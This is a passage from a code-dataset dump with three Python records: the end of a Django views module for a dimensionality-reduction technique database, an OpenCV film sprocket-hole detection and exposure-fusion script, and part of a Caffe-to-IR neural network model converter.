c.technique_handling_ability\n # using get will return the verbose name of the object retrieved. In order to access the individual attributes,\n # we can either use the dot operator or python's getattr function\n try:\n projection_technique = MDP.objects.get(mdp_id=pk)\n # No need to use filter here because we will only be retrieving one item\n complexity = (MathJaxFormulas.objects.get(id=projection_technique.complexity_id)).mathjaxeqn\n datatype_vals = getvalues(projection_technique, data_type_fieldnames)\n tax_vals = getvalues(projection_technique, tax_fieldnames)\n projtech_name = getvalues(projection_technique, projtech_fieldname)\n # print(datatype_vals)\n # datatype_vals = (list(projection_technique.values_list('dissimilarity_id', 'ordinal_id', 'cartesian_id',\n # 'ne_structures_id', 'categorical_id'\n # )\n # )\n # )[0]\n reference = projection_technique.reference_paper\n print(projection_technique.variant_refs.all())\n # These numbers are those that don't have a projection technique associated wiht them in the paper\n variant_ref_nos = projection_technique.variant_refs.all()\n # These are those that have a name associated with them ex: iPCA\n # Till .all() will return a set of objects from the variants table and then we retrieve only the\n # variant_name and variant_references attributes in a queryset.\n # need to typecast the tuples into a list so that i can modify them later on. That's why list(i)\n tech_variants = [list(i) for i in\n list(projection_technique.tech_variants.all().values_list('variant_name', 'variant_reference'))]\n variant_refs = [variant_ref for (_, variant_ref) in tech_variants]\n # This will give us the __str__ of the object which will have both the id as well as the citation text\n ref_vals = Reference.objects.filter(id__in=variant_refs)\n for tech_variant in tech_variants:\n for ref_val in ref_vals:\n if tech_variant[1] == ref_val.id:\n tech_variant[1] = ref_val\n description = projection_technique.description\n # print(tech_variants, ref_vals)\n return render(request, 'mdpbasic.html',\n {\"mdp_list\": data, \"projtechname\": projtech_name,\n \"handling_text\": handling_text,\n \"text_display\": txtdisp_data, \"data_type_vals\": datatype_vals,\n \"text_tax\": txtdisp_tax, \"tax_vals\": tax_vals,\n \"complexity\": complexity, \"reference\": reference,\n \"varrefno\": variant_ref_nos, \"tech_variants\": tech_variants,\n \"description\": description,\n \"reroute_string\": \"mdpbasic\",\n 'got_item': True}\n )\n except ObjectDoesNotExist:\n return render(request, 'mdpbasic.html',\n {'mdp_list': data, 'got_item': False,\n 'reroute_string': \"mdpbasic\"}\n )\n\n\n\n\ndef qmbasic(request, pk=None):\n data = QualityMeasure.objects.values('measure_name', 'measure_id').order_by('measure_id')\n try:\n measure_method = QualityMeasure.objects.get(measure_id=pk)\n # No need to use filter here because we will only be retrieving one item\n rangee = measure_method.rangee\n field_vals = []\n qm_fieldsets = [value for _, value in qm_fieldnames.items()]\n # field_vals is a list of lists. Each list within the main list has exactly 2 elements (also lists). The first\n # element contains the values returned from the query corresponding to a particular section. Example for the Span\n # section we get the values [None, None] for example corresponding to ['Local', 'Global'] in the second element\n # The filter chaining in the template can be understood based on this. There are 2 possible objects that can be\n # returned as can be inferred from above i.e. a mathjaxformula object or a qm_parameter object. So in the template\n # I am checking if the object contains the mathjaxeqn parameter and if it doesn't I know it is a qm_parameter option\n # and then I can go for the parameter_option passed through the filter\n for index in range(len(qm_fieldsets)):\n fieldset = qm_fieldsets[index]\n field_vals.append([list(getvalues(measure_method, fieldset)), parameter_text[index]])\n references = measure_method.reference.all()\n description = measure_method.description\n print(qm_fieldnames.items(), field_vals, sep='\\n')\n\n return render(request, 'qmbasic.html',\n {\"qm_list\": data, \"measure_method\": measure_method,\n \"qm_fielditems\": qm_fieldnames.items(),\n \"parameter_text\": parameter_text,\n \"field_vals\": field_vals,\n \"references\": references,\n \"description\": description,\n \"reroute_string\": \"qmbasic\",\n 'got_item': True,\n }\n )\n except ObjectDoesNotExist:\n return render(request, 'qmbasic.html',\n {'qm_list': data, 'got_item': False,\n \"reroute_string\": \"qmbasic\",}\n )\n\ndef taskbasic(request, pk=None):\n # If it is a child task, then we need to use the parent_id to retrieve the\n # reference from the parent. This is because only the parent will have the reference number.\n data = Task.objects.values('task_name', 'task_id').order_by('task_id')\n try:\n task_retd = Task.objects.get(task_id=pk)\n description = task_retd.description\n parent_id = task_retd.parent_id\n numbers_ids = task_retd.numbers\n parent_obj = None\n numbers = None\n children = None\n if parent_id:\n print((Task.objects.get(task_id=parent_id.task_id)).task_id)\n parent_obj = getvalues(Task.objects.get(task_id=parent_id.task_id),\n ['task_id', 'task_name', 'reference_list'])\n reference = parent_obj[2]\n else:\n reference = task_retd.reference_list\n child_objs = task_retd.child_id.all()\n if child_objs:\n children = child_objs.values('task_id', 'task_name')\n if numbers_ids:\n numbers = numbers_ids.all().values('task_id', 'task_name')\n print(task_fields)\n return render(request, 'taskbasic.html',\n {\"task_list\": data, \"task_fields\": task_fields,\n \"task_retd\": task_retd, \"reference\": reference, \"children\": children, \"parent_obj\": parent_obj,\n \"numbers\": numbers, \"description\": description,\n \"reroute_string\": \"taskbasic\",\n 'got_item': True\n }\n )\n except ObjectDoesNotExist:\n return render(request, 'taskbasic.html',\n {'task_list': data, 'got_item': False,\n 'reroute_string': \"taskbasic\"}\n )\n\n\ndef get_lang_vals(object_data, parameter_name, language_data):\n language_data[parameter_name] = []\n for language in object_data.all():\n language_data[parameter_name].append([\n getvalues(language, ['language_id', 'language_name', 'description']),\n language.toolboxes_suppd.all()\n ])\n return language_data\n\n\ndef lang_mdps(request, pk=None):\n # If it is a child task, then we need to use the parent_id to retrieve the\n # reference from the parent. This is because only the parent will have the reference number.\n data = MDPsForLang.objects.values('mdp_name', 'mdp_id').order_by('mdp_id')\n try:\n projtech_retd = MDPsForLang.objects.get(mdp_id=pk)\n description = projtech_retd.description\n language_data = {}\n language_data = get_lang_vals(projtech_retd.circle_list, \"Toolboxes_list\", language_data)\n language_data = get_lang_vals(projtech_retd.square_list, \"Libraries_List\", language_data)\n references = projtech_retd.reference_list.all()\n print(language_data)\n\n return render(request, 'lang_mdps.html',\n {\"methods_list\": data,\n \"proj_name\": projtech_retd.mdp_name, \"description\": description,\n \"language_data\": language_data, \"references\": references,\n \"reroute_string\": \"lang_mdps\", \"got_item\": True,\n \"inter_route\": \"lang_langs\"\n }\n )\n except ObjectDoesNotExist:\n return render(request, 'lang_mdps.html',\n {\"methods_list\": data,\n \"reroute_string\": \"lang_mdps\", \"got_item\": False\n }\n )\n\ndef get_operator(request):\n operator = \"~\" if (request.GET.get(\"Exc\", '') == \"Yes\") else \"\"\n if request.GET.get(\"All\", '') == \"Yes\":\n operator += \"&\"\n else:\n operator += \"|\"\n return operator\n\ndef nonetype_query_generator_fn(request, field_name_list, id_field = \"mdp_id\"):\n # Since the fields we are going to be querying from are strings, I'm putting the string of the column name into a\n # dictionary and packing it using the ** operator to pass as an argument. If the request returns the value Yes, that\n # means that the object was selected. We put the column string as the key of the dictionary and have the value as\n # None. This is because if the Include button is selected (as by default), we will be forming the query as\n # ~Q(parameter_name = None) so that all objects for which the parameter_name is not None will be returned in the\n # queryset.\n options = {}\n # # Basically if the Exc button has been selected that means we need to search for all the objects in which the\n # # parameters OTHER than the ones currently selected are non-null. So that means if dissimilarity is selected and\n # # so is exclude, that means we need to search for non-null values in every field EXCEPT for dissimilarity.\n # # The below code section will do that.\n for query_obj in field_name_list:\n request_val = request.GET.get(query_obj,'')\n # range_eqn not in query obj is used in the case of the qm advd section. This is because to render the rangee\n # section, we are not using the rangee field name but instead getting the mathjaxeqns. So range_eqn15 and so on\n # don't actually corresponds to fields in the database and so if we try to query from such fields we will get\n # errors. That's why the second if condition has been put. Objects with range_eqn15 will be handled separately.\n if request_val == \"Yes\" :\n # The database represents the absence of a value in a field using None. However, this is not the \"None\"\n # but the None datatype. And so we have to use None and not \"None\".\n options[query_obj] = None\n operator = get_operator(request)\n queries = Q()\n for key in options:\n # This will take care of the case where ALL techniques that are capable of handling a particular property\n # need to be retrieved.\n base_query = Q(**{key: options[key]})\n if \"&\" in operator:\n if \"~\" in operator:\n queries &= base_query\n else:\n queries &= (~base_query)\n # This will take care of the case where ANY techniques that are capable of handling a particular property\n # need to be retrieved.\n else:\n if \"~\" in operator:\n queries |= base_query\n else:\n queries |= (~base_query)\n # When the advanced pages are first rendered no fields are selected by default. So the options field doesn't\n # contain any parameters and as a results, queries is empty i.e. there is no filter applied to the objects. Thus,\n # the objects will be returned the first time the page is rendered and all the techniques will be displayed in the\n # results section. To circumvent this, I check if options is empty and if it is, I check for all objects where the\n # id field is NULL. Since the id field is a primary key and can't ever be NULL, no objects will be returned. This\n # is why the options parameter also needs to be passed back. On the advanced pages where both the reg and none_type\n # query generator are used, both option dictionaries need to be checked before it can be concluded that no options\n # was selected.\n return (queries, options)\n\n\ndef mdpadvanced(request):\n link_data = list(zip(data_type_fieldnames, txtdisp_data))\n link_props = list(zip(tax_fieldnames, txtdisp_tax))\n queries, options = nonetype_query_generator_fn(request, data_type_fieldnames + tax_fieldnames)\n if not options:\n queries = Q(**{\"mdp_id\": None})\n print(queries)\n results = MDP.objects.filter(queries).values('mdp_id', 'mdp_name', 'mdp_fullname')\n # print(results)\n # print(len(results), results)\n return render(request, \"mdpadvanced.html\",\n {\n \"link_data\": link_data, \"link_props\": link_props,\n \"filter_options\": filter_options, \"results\": results,\n \"reroute_string\": \"mdpbasic\",\n })\n\ndef reg_query_generator_fn(request, regquery_strings, trivial_string = \"range_eqn\", field_name = \"rangee\"):\n # For the none_type query generator, each string that was passed as an options key was unique. However here,\n # range_eqn15 and range_eqn16 both correspond to one key i.e. the rangee field in the main table. This is why on the\n # site, we need to make sure that when only 1 button in the range section has been selected because each technique\n # can have only one range formula. The same will apply for when we are doing the input space.\n options = {}\n for query_obj in regquery_strings:\n request_val = request.GET.get(query_obj,'')\n # Suppose range_eqn15 gives us the value true, we need only the integer value to query against the rangee_id\n # field in the database. The trivial string here is range_eqn, so we split on that and take the 2nd element of\n # the list which is the id. So now that we have the id of the field, we want to check if the id is present in\n # the rangee field. But since we have the range id and not the value of the equation, we need to use rangee_id\n # not just rangee and that's why I have added the _id below.\n if request_val == \"Yes\":\n try:\n id_obtd = int(query_obj.split(trivial_string)[1])\n except ValueError:\n id_obtd = query_obj.split(trivial_string)[1]\n if field_name != \"best\" and field_name != \"actor\":\n options[(field_name+\"_id\")] = id_obtd\n # best is the only field that will be passed to this function that will not use a foreign key. so in that\n # case we should not be adding _id to the end of it because best_id doesn't exist.\n else:\n options[(field_name)] = id_obtd\n break\n operator = get_operator(request)\n queries = Q()\n for key in options:\n # This will take care of the case where ALL techniques that are capable of handling a particular property\n # need to be retrieved.\n base_query = Q(**{key: options[key]})\n if \"&\" in operator:\n if \"~\" in operator:\n queries &= (~base_query)\n else:\n queries &= base_query\n # This will take care of the case where ANY techniques that are capable of handling a particular property\n # need to be retrieved.\n else:\n if \"~\" in operator:\n queries |= (~base_query)\n else:\n queries |= base_query\n return (queries, options)\n\n\ndef qmadvanced(request):\n qmfield_strings = []\n for i in qm_fieldnames.values():\n qmfield_strings += i\n # In the view we will use the dictionary to dynamically display sections. Except for the rangee parameter. There\n # instead of just displaying rangee text, we will instead query for all the objects from mathjaxeqns whose type is\n # rangee and then display those as options. We just need to append those generated ids to qm_fieldstrings\n # before generating the queries. The id for the range objects will be range_eqn_16 for an equation whose id is 16.\n range_options = list(MathJaxFormulas.objects.filter(equation_type_id=2).values_list('mathjaxeqn', 'id'))\n # print(range_options)\n qmfield_strings.remove('rangee')\n qmfield_strings.remove('best')\n regquery_strings = [\"range_eqn\"+str(id) for _, id in range_options]\n best_query_strings = ['best0', 'best1']\n queries, options1 = nonetype_query_generator_fn(request, qmfield_strings, 'measure_id')\n reg_queries, options2 = reg_query_generator_fn(request, regquery_strings)\n best_queries, options3 = reg_query_generator_fn(request, best_query_strings, 'best', 'best')\n # print(reg_queries)\n # range_eqn not in query obj is used in the case of the qm advd section. This is because to render the rangee\n # section, we are not using the rangee field name but instead getting the mathjaxeqns. So range_eqn15 and so on\n # don't actually corresponds to fields in the database and so if we try to query from such fields we will get\n # errors. That's why the second if condition has been put. Objects with range_eqn15 will be handled separately.\n operator = get_operator(request)\n # The individual query generator functions have already handled for include/exclude. Now the just need to AND or\n # OR the resultant generated queries together.\n if \"&\" in operator:\n queries &= reg_queries\n queries &= best_queries\n print(queries)\n else:\n queries |= reg_queries\n queries |= best_queries\n # Check in mdp_advanced for the explanation of this statement.\n if not options1 and not options2 and not options3:\n queries = Q(**{\"measure_id\": None})\n\n results = QualityMeasure.objects.filter(queries).values('measure_id', 'measure_name')\n # print(len(results), results)\n return render(request, \"qmadvanced.html\",\n {\n \"parameter_text\": parameter_text, \"qm_fieldnames\": qm_fieldnames,\n \"field_vals\": list(qm_fieldnames.values()),\n \"filter_options\": filter_options, \"results\": results,\n \"range_options\": range_options, \"best_options\": best_query_strings,\n \"range_strings\": regquery_strings, 'reroute_string': 'qmbasic'\n })\n\ndef taskadvanced(request):\n # This will be a dictionary. The key is going to be the trivial string that will be passed to the query_generator.\n # The values are going to be 2-element lists that have the id of the element from the respective table and also\n # the string to be displayed on the webpage.\n\n # CAUTION. The order in which key-value pairs are being added to the dictionary below is important. The must follow\n # same order as followed in task_fieldnames to give the string display names. This is because in the template, the\n # loop counters are synched for fetching datas, assigning ids etc. Just don't change the order that's all. Or if you\n # do, modify the order in task_fieldnames too.\n task_fieldoptions = {}\n task_types = list(TaskType.objects.all().values_list('id', 'type_name'))\n task_fieldoptions['task_type'] = task_types\n # print(task_types)\n spaces = list(Task.objects.all().values_list('input_space', 'output_space'))\n input_space_ids, output_space_ids = [i[0] for i in spaces], [i[1] for i in spaces]\n input_space_objects = list((MathJaxFormulas.objects.filter(id__in=input_space_ids)).values_list('id', 'mathjaxeqn'))\n # print(input_space_objects)\n output_space_objects = list((MathJaxFormulas.objects.filter(id__in=output_space_ids)).values_list(\n 'id', 'mathjaxeqn')\n )\n task_fieldoptions['in_sp'] = input_space_objects\n task_fieldoptions['out_sp'] = output_space_objects\n ts_options = list(MathJaxFormulas.objects.filter(equation_type_id=4).values_list('id', 'mathjaxeqn'))\n # print(ts_options)\n task_fieldoptions['actor'] = [(\"U\", \"User\"), (\"M\", \"Machine\"), (\"UnM\", \"User & Machine\")]\n task_fieldoptions['ts_opt'] = ts_options\n regquery_strings = []\n for key, values in task_fieldoptions.items():\n temp = []\n for value in values:\n # value[0] is the id of the object and key is the trivial string.\n temp.append(key + str(value[0]))\n regquery_strings.append(temp)\n print(regquery_strings)\n # print(task_fieldoptions)\n query_sets = []\n option_set = []\n operator = get_operator(request)\n trivial_strings = list(task_fieldoptions.keys())\n index = 0\n for _, field_name in task_fieldnames:\n reg_queries, options = reg_query_generator_fn(request, regquery_strings[index],\n trivial_string=trivial_strings[index], field_name=field_name)\n index += 1\n query_sets.append(reg_queries)\n option_set.append(options)\n combined_query = Q()\n for query_set in query_sets:\n if \"&\" in operator:\n combined_query &= query_set\n else:\n combined_query |= query_set\n flag = 1\n for options in option_set:\n if options:\n flag = 0\n break\n if flag == 1:\n combined_query = Q(**{\"task_id\": None})\n print(combined_query)\n results = Task.objects.filter(combined_query).values('task_id', 'task_name')\n # print(len(results), results)\n return render(request, \"taskadvanced.html\",\n {\n \"task_fieldnames\": task_fieldnames, \"task_fieldoptions\": task_fieldoptions,\n \"filter_options\": filter_options, \"results\": results,\n \"query_strings\": regquery_strings, \"reroute_string\": \"taskbasic\",\n })\n\ndef lang_langs(request, pk=None):\n # https://www.revsys.com/tidbits/tips-using-djangos-manytomanyfield/\n # I'm going to be mapping backwards in this function. Instead of finding the languages I'm going to be using the\n # language to find the related mdps that can be handled. Django has a way to achieve this without having to iterate\n # through every single MDP and check their lists. The language object knows what mdp objects have a relation onto it\n # this list of objects can be obtained as a queryset by accessing the parameter specified by the related name in the\n # main table. i.e. In MDPsForLangs, circle_list has the related_name toolboxes. So to get the mdps that can be\n # handled using this toolbox, I need to just use language_retd.toolboxes.all(). similarly language_retd.libs.all()\n\n data = Languages.objects.values('language_name', 'language_id').order_by('language_id')\n try:\n language_retd = Languages.objects.get(language_id=pk)\n # .distinct() will handle any duplicates\n mdps_handled = (language_retd.toolboxes.all() | language_retd.libs.all()).distinct()\n\n # mdps_handled = []\n # for mdp_object in all_mdps_handled:\n # # Getting the list of querysets containing toolboxes and libraries separately\n # mdp_langs = [i.all() for i in getvalues(mdp_object, ['circle_list', 'square_list'])]\n # for query_set in mdp_langs:\n # # if language_retd in query_set:\n # # mdps_handled.append(mdp_object)\n # # If I've already found it in the first i.e. toolboxes queryset I don't want to search libraries also.\n # if query_set.filter(language_id=pk).exists():\n # mdps_handled.append(mdp_object)\n # break\n description = language_retd.description\n toolboxes_suppd = language_retd.toolboxes_suppd.all()\n\n return render(request, 'lang_langs.html',\n {\"language_list\": data, \"description\": description,\n \"lang_name\": language_retd.language_name,\n \"toolboxes_suppd\": toolboxes_suppd, \"mdps_handled\": mdps_handled,\n \"reroute_string\": \"lang_mdps\",\n \"got_item\": True,\n }\n )\n except ObjectDoesNotExist:\n return render(request, 'lang_langs.html',\n {\"language_list\": data, \"got_item\": False,\n \"reroute_string\": \"lang_langs\"})\n\ndef enrichbasic(request, pk=None):\n type_objects = EnrichmentType.objects.all()\n type_strings = list(type_objects.values_list('type_name', flat=True))\n enrich_dict = {}\n for index in range(len(type_strings)):\n type_name = type_strings[index]\n type_object = type_objects[index]\n enrich_dict[type_name] = Enrichment.objects.filter(enrichment_type=type_object)\n try:\n enrichment_retd = Enrichment.objects.get(enrichment_id=pk)\n references = enrichment_retd.references.all()\n return render(request, 'enrichbasic.html',\n {'enrichment_info': enrich_dict,\n \"enrichment_retd\": enrichment_retd,\n \"references\": references, \"got_item\": True,\n \"reroute_string\": \"enrichbasic\"\n }\n )\n except ObjectDoesNotExist:\n return render(request, 'enrichbasic.html',\n {'enrichment_info': enrich_dict,\n \"got_item\": False, \"reroute_string\": 'enrichbasic'\n }\n )\n\ndef do_nothing(request):\n return render(request, 'introduction.html')\n\n\n","repo_name":"Sharpfawkes/DB4MDP_NEW","sub_path":"mdp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":33406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"20781472013","text":"import cv2 as cv\nimport numpy as np\nimport os\nimport subprocess\n\ndef OutputFolder() -> str:\n # Create folders for the different EV exposure levels\n \n # Image Output path - create if needed\n path = os.path.join(os.getcwd(), \"Capture\")\n\n if not os.path.exists(path):\n raise FileNotFoundError(path)\n\n return path\n\n\ndef DetectSproketHoleByTemplate(template, img):\n sproket_mask = np.zeros(img.shape[:2], dtype=\"uint8\")\n image_height, image_width = img.shape[:2]\n # top-left corner and bottom-right corner\n cv.rectangle(sproket_mask, (200, 380), (420, 650), 255, -1)\n img = cv.bitwise_and(img, img, mask=sproket_mask)\n\n matrix = (3, 9)\n imgGry = cv.cvtColor(img, cv.COLOR_BGR2GRAY)\n\n template = cv.imread('sproket_hole_template.png',None)\n templateGry = cv.cvtColor(template, cv.COLOR_BGR2GRAY)\n w, h = template.shape[:2]\n\n res = cv.matchTemplate(imgGry,templateGry,cv.TM_CCORR_NORMED)\n min_val, max_val, min_loc, max_loc = cv.minMaxLoc(res)\n\n #print(min_val, max_val, min_loc, max_loc)\n\n top_left = max_loc\n bottom_right = (top_left[0] + h, top_left[1] + w)\n return top_left,bottom_right\n\n#CAMERA_EXPOSURE = [-8.0,-4.0,-10.0]\nCAMERA_EXPOSURE = [-8.0]\n\npath=OutputFolder()\n\ntemplate = cv.cvtColor(cv.imread('sproket_hole_template.png',None), cv.COLOR_BGR2GRAY)\n\n\nfor frame_number in range(0,21+1):\n print(\"Frame\",frame_number)\n\n cmd_line=[]\n cmd_line.append(\"e:\\source\\enblend-4.2\\enfuse.exe\")\n cmd_line.append(\"-l\")\n cmd_line.append(\"8\")\n cmd_line.append(\"-o\")\n cmd_line.append(os.path.join(path, \"frame_{:08d}.png\".format(frame_number)))\n\n for my_exposure in CAMERA_EXPOSURE:\n filename = os.path.join(path+\"{0}\".format(my_exposure), \"frame_{:08d}.png\".format(frame_number))\n\n cmd_line.append(filename)\n\n if not os.path.exists(filename):\n raise FileNotFoundError(filename)\n\n #Load the source image\n img = cv.imread(filename,None)\n # Roughly detect the sproket hole by template image\n #top_left,bottom_right = DetectSproketHoleByTemplate(template, img)\n #print(top_left,bottom_right)\n\n top_left=(237,410)\n bottom_right=(389,603)\n\n # Create mask over sproket hole\n sproket_mask = np.zeros(img.shape[:2], dtype=\"uint8\")\n image_height, image_width = img.shape[:2]\n # Expand the mask rectangle\n PADDING=16\n top_left = (top_left[0]-PADDING,top_left[1]-PADDING)\n bottom_right = (bottom_right[0]+PADDING,bottom_right[1]+PADDING)\n # top-left corner and bottom-right corner\n cv.rectangle(sproket_mask, top_left, bottom_right, 255, -1)\n # Apply the mask to original image, leaving only the sproket hole visible\n sproket_hole = cv.bitwise_and(img, img, mask=sproket_mask)\n\n # Convert to gray and blur\n matrix = (5, 5)\n sproket_hole = cv.cvtColor(cv.GaussianBlur(sproket_hole, matrix, 0), cv.COLOR_BGR2GRAY)\n\n sproket_hole = cv.equalizeHist(sproket_hole)\n\n # Threshold\n _, threshold = cv.threshold(sproket_hole, 155, 255, cv.THRESH_BINARY)\n\n canny_edges = cv.Canny(threshold, 100, 200)\n\n contours, _ = cv.findContours(canny_edges, cv.RETR_EXTERNAL, cv.CHAIN_APPROX_NONE)\n\n # Sort by area, largest first (hopefully our sproket - we should only have 1 full sprocket in view at any 1 time)\n contour = sorted(contours, key=lambda x: cv.contourArea(x), reverse=True)[0]\n\n area = cv.contourArea(contour)\n rect = cv.minAreaRect(contour)\n rotation = rect[2]\n centre = rect[0]\n # Gets center of rotated rectangle\n box = cv.boxPoints(rect)\n # Convert dimensions to ints\n box = np.int0(box)\n colour = (0, 0, 0)\n cv.drawContours(img, [contour], -1,color=colour, thickness=cv.FILLED)\n \n # Check we have the top left and not bottom left\n if box[0][0] 0:\n weight_blob_proto = layer_parameter.blobs[0]\n weight_blob_name = caffe_name_to_ir_name(layer_name + '_w')\n if (verbose):\n print (weight_blob_name)\n buf = convert_caffe_bin_to_ir_bin(weight_blob_proto.data)\n graph.addBinary(weight_blob_name, buf)\n\n if blob_size > 1:\n bias_blob_proto = layer_parameter.blobs[1]\n bias_blob_name = caffe_name_to_ir_name(layer_name + '_b')\n if (verbose):\n print (bias_blob_name)\n buf = convert_caffe_bin_to_ir_bin(bias_blob_proto.data)\n graph.addBinary(bias_blob_name, buf)\n\n# extracting input from caffe network and converting into ir input.\ndef extractInput(net_parameter, graph, input_dims):\n inputList = {}\n if (len(net_parameter.layer) == 0):\n layers = net_parameter.layers\n else:\n layers = net_parameter.layer\n first_layer_param = layers[0]\n first_layer_param_type = first_layer_param.type\n input_name = \"\"\n if len(net_parameter.input) != 0:\n input_name = caffe_name_to_ir_name(net_parameter.input[0])\n elif (first_layer_param_type == \"Data\" or first_layer_param_type == \"Input\" or first_layer_param_type == \"ImageData\"):\n top_list = first_layer_param.top\n if (len(top_list) == 0):\n input_name = caffe_name_to_ir_name(first_layer_param.name)\n else:\n input_name = caffe_name_to_ir_name(top_list[0])\n else:\n bottom_list = first_layer_param.bottom\n if (len(bottom_list) == 0):\n top_list = first_layer_param.top\n input_name = caffe_name_to_ir_name(top_list[0])\n else:\n input_name = caffe_name_to_ir_name(bottom_list[0])\n\n inputList[str(input_name)] = input_dims\n graph.addInput(caffe_blob_to_ir_tensor(input_name, \"F032\", input_dims))\n return inputList\n\n# extraction of output from caffe network to ir output.\ndef extractOutput(graph, inputOutputLayers, output_list, verbose):\n outputList = {}\n if (len(output_list) == 1):\n last_layer_index = len(inputOutputLayers) - 1\n last_layer_info = inputOutputLayers[last_layer_index]\n output_map = last_layer_info[\"outputs\"]\n output_name = list(output_map.keys())[0]\n if (verbose):\n print (\"output name is : \" + output_name)\n output_dims = output_map[output_name]\n graph.addOutput(caffe_blob_to_ir_tensor(output_name, \"F032\", output_dims))\n outputList[output_name] = output_dims\n else:\n for i in range(len(output_list)):\n output_name = output_list[i]\n if (verbose):\n print (\"output name at index: \"+ str(i) + \" \" + output_name)\n for j in range(len(inputOutputLayers)):\n if (output_name in inputOutputLayers[j][\"layer_name\"]):\n output_map = inputOutputLayers[j][\"outputs\"]\n output_dims = output_map[output_name]\n graph.addOutput(caffe_blob_to_ir_tensor(output_name, \"F032\", output_dims))\n outputList[output_name] = output_dims\n break\n return outputList\n\n# extract layer attribute information from caffe layers.\ndef extractCaffeAttrInfo(layer_param):\n if(type(layer_param) == caffe_pb2.V1LayerParameter):\n layer_type = convertV1LayerTypeToString(layer_param)\n else:\n layer_type = layer_param.type\n attribute_map = {}\n if (layer_type == \"Convolution\" or layer_type == \"Deconvolution\"):\n conv = layer_param.convolution_param\n pad_h = conv.pad_h if (conv.HasField('pad_h')) else (int(conv.pad[0]) if (len(conv.pad) > 0) else 0)\n pad_w = conv.pad_w if (conv.HasField('pad_w')) else (int(conv.pad[1]) if (len(conv.pad) > 1) else pad_h)\n stride_h = conv.stride_h if (conv.HasField('stride_h')) else (int(conv.stride[0]) if (len(conv.stride) > 0) else 1)\n stride_w = conv.stride_w if (conv.HasField('stride_w')) else (int(conv.stride[1]) if (len(conv.stride) > 1) else stride_h)\n kernel_h = conv.kernel_h if (conv.HasField('kernel_h')) else (int(conv.kernel_size[0]) if (len(conv.kernel_size) > 0) else 0)\n kernel_w = conv.kernel_w if (conv.HasField('kernel_w')) else (int(conv.kernel_size[1]) if (len(conv.kernel_size) > 1) else kernel_h)\n dilation_h = conv.dilation[0] if (len(conv.dilation) > 0) else 1\n dilation_w = conv.dilation[1] if (len(conv.dilation) > 1) else dilation_h\n groups = conv.group if (conv.HasField('group')) else 1\n\n attribute_map[\"strides\"] = [stride_w, stride_h]\n attribute_map[\"kernel_shape\"] = [kernel_w, kernel_h]\n attribute_map[\"group\"] = groups\n attribute_map[\"pads\"] = [pad_w, pad_h, pad_w, pad_h]\n attribute_map[\"dilations\"] = [dilation_w, dilation_h]\n\n elif (layer_type == \"Pooling\"):\n pooling = layer_param.pooling_param\n pad_h = int(pooling.pad_h) if (pooling.HasField('pad_h')) else int(pooling.pad)\n pad_w = int(pooling.pad_w) if (pooling.HasField('pad_w')) else int(pooling.pad)\n stride_h = int(pooling.stride_h) if (pooling.HasField('stride_h')) else int(pooling.stride)\n stride_w = int(pooling.stride_w) if (pooling.HasField('stride_w')) else int(pooling.stride)\n kernel_h = int(pooling.kernel_h) if (pooling.HasField('kernel_h')) else int(pooling.kernel_size)\n kernel_w = int(pooling.kernel_w) if (pooling.HasField('kernel_w')) else int(pooling.kernel_size)\n\n attribute_map[\"strides\"] = [stride_w, stride_h]\n attribute_map[\"kernel_shape\"] = [kernel_w, kernel_h]\n attribute_map[\"pads\"] = [pad_w, pad_h, pad_w, pad_h]\n attribute_map[\"dim_round_mode\"] = \"ceil\"\n #attribute_map[\"dilations\"] = [1,1]\n\n elif (layer_type == \"LRN\"):\n lrn = layer_param.lrn_param\n local_size = int(lrn.local_size)\n alpha = float(lrn.alpha)\n beta = float(lrn.beta)\n k = float(lrn.k)\n norm_region = lrn.norm_region\n\n attribute_map[\"alpha\"] = alpha\n attribute_map[\"beta\"] = beta\n attribute_map[\"size\"] = local_size\n attribute_map[\"bias\"] = k\n if (norm_region == caffe_pb2.LRNParameter.ACROSS_CHANNELS):\n attribute_map[\"mode\"] = 1\n elif (norm_region == caffe_pb2.LRNParameter.WITHIN_CHANNEL):\n attribute_map[\"mode\"] = 0\n\n elif (layer_type == \"BatchNorm\"):\n attribute_map[\"epsilon\"] = float(layer_param.batch_norm_param.eps)\n\n elif (layer_type == \"InnerProduct\"):\n attribute_map[\"broadcast\"] = 1\n attribute_map[\"transB\"] = 1\n elif (layer_type == \"ReLU\"):\n relu = layer_param.relu_param\n slope = relu.negative_slope\n attribute_map[\"alpha\"] = slope\n elif (layer_type == \"Interp\"):\n if layer_param.python_param.param_str != '':\n python_param_str = eval(layer_param.python_param.param_str)\n zoom_factor = int(python_param_str[\"zoom_factor\"])\n else:\n zoom_factor = 2 #default value\n attribute_map[\"zoom_factor\"] = zoom_factor\n elif (layer_type == \"Crop\"):\n crop = layer_param.crop_param\n axis = crop.axis if (crop.HasField('axis')) else 2\n offset = crop.offset\n new_offset = []\n\n for i in range(4):\n if (i < axis):\n new_offset.append(0)\n else:\n if (len(offset) == 1):\n new_offset.append(offset[0]) \n else:\n new_offset.append(offset[i-axis])\n\n attribute_map[\"axis\"] = axis\n attribute_map[\"offset\"] = new_offset\n\n elif (layer_param.type == \"Reshape\"):\n reshape = layer_param.reshape_param\n shape = reshape.shape.dim\n new_shape = [int(z) for z in shape]\n attribute_map[\"shape\"] = new_shape\n\n elif (layer_param.type == \"Concat\"):\n concat = layer_param.concat_param\n axis = concat.axis\n attribute_map[\"axis\"] = axis\n\n elif (layer_param.type == \"DetectionOutput\"):\n detection_output = layer_param.detection_output_param\n num_classes = detection_output.num_classes\n share_location = detection_output.share_location\n background_label_id = detection_output.background_label_id\n nms_threshold = detection_output.nms_param.nms_threshold\n top_k = detection_output.nms_param.top_k\n code_type = detection_output.code_type\n variance_encoded_in_target = detection_output.variance_encoded_in_target\n keep_top_k = detection_output.keep_top_k\n confidence_threshold = detection_output.confidence_threshold\n attribute_map[\"num_classes\"] = num_classes\n attribute_map[\"share_location\"] = 1 if share_location == True else 0\n attribute_map[\"background_label_id\"] = background_label_id\n attribute_map[\"nms_threshold\"] = nms_threshold\n attribute_map[\"top_k\"] = top_k\n attribute_map[\"code_type\"] = code_type\n attribute_map[\"variance_encoded_in_target\"] = 1 if variance_encoded_in_target == True else 0\n attribute_map[\"keep_top_k\"] = keep_top_k\n attribute_map[\"confidence_threshold\"] = confidence_threshold\n \n elif (layer_param.type == \"Softmax\"):\n softmax = layer_param.softmax_param\n axis = softmax.axis\n attribute_map[\"axis\"] = axis\n \n return attribute_map\n\n# calculate dimensions of the output of each layer.\ndef 